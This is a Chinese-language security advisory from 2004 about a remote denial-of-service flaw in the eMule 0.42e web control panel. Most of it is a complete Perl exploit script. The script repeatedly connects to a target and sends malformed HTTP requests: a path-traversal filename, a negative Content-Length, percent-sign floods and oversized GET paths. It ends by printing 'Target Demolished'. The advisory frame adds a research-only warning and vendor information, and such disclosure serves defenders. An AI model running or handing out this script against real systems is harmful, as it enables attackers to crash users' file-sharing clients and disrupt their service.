安全研究

安全漏洞
EMule Web控制面板远程拒绝服务漏洞

发布日期:2004-05-10
更新日期:2004-05-14

受影响系统:
Emule Emule 0.42e
描述:
BUGTRAQ  ID: 10317

eMule是一款可靠的点对点档案共享客户端。

eMule Web控制面板不正确处理畸形请求,远程攻击者可以利用这个漏洞对应用程序进行拒绝服务攻击。

提交畸形GET请求,可使eMule应用程序崩溃。

<*来源:Rafel Ivgi, The-Insider (nuritrv18@bezeqint.net
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Rafel Ivgi, The-Insider (nuritrv18@bezeqint.net)提供了如下测试方法:

#!/usr/bin/perl

system("cls");
# Emule 0.42e Remote Denial Of Service Exploit
# Coded by Rafel Ivgi, The-Insider:   http://theinsider.deep-ice.com
# usage: perl emule042e.pl <host> <port> <how many times>

use IO::Socket;
my $host = $ARGV[0];
my $port = $ARGV[1];
my $times = $ARGV[2];

if ($host)
{
unless($port) { $port="4711";}
unless($times) { $times="50";}
{
                print "Emule 0.42e Remote Denial Of Service Exploit
           Coded by The-Insider\n\n";
                print "[+] Connecting to target $host:$port\n";
for $i (1..$times) {
                $remote=IO::Socket::INET->new(Proto =>"tcp",
  PeerAddr => $host,
  PeerPort =>  80,
                                    Type => SOCK_STREAM
                                    Timeout => 8);

unless ($remote)
                  {
                  die "can't connect to $host"
                  }
                  print "[+] Connected to target $host:$port\n";
                  print "[+] Sending Request\n";
$remote ->autoflush(1);
print $remote "GET / HTTP/1.1
Content-Disposition: form-data; name=\"file\";
filename=\"../../../file.txt\"

";
print $remote "POST / HTTP/1.0
Content-Length: 10

123456789

";
print $remote "POST / HTTP/1.1
Content-Length: -1

";
print $remote "GET /%%%%%%%%%%%% HTTP/1.0

";
print $remote "index.htm

";
print $remote "GET
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1

";
print $remote "GET
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa

";
print $remote "GET c:\

";
                  print $remote "GET
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1

";
                  while(<$remote>)
                  {
                  $cool .= $_;
if ($cool =~ /Server:/i)
                  {
                  close $cool;
                 -close $remote;
                  }
                  }
                  print "[+] Target Demolished.\n";
}}}
else
{
die "\nEmule 0.42e Remote Denial Of Service Exploit
Coded by Rafel Ivgi, The-Insider:   http://theinsider.deep-ice.com


usage: perl emule042e.pl <host> <port> <how many times>\n\n";
}

建议:
厂商补丁:

Emule
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://emule-project.net/

浏览次数:3311
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障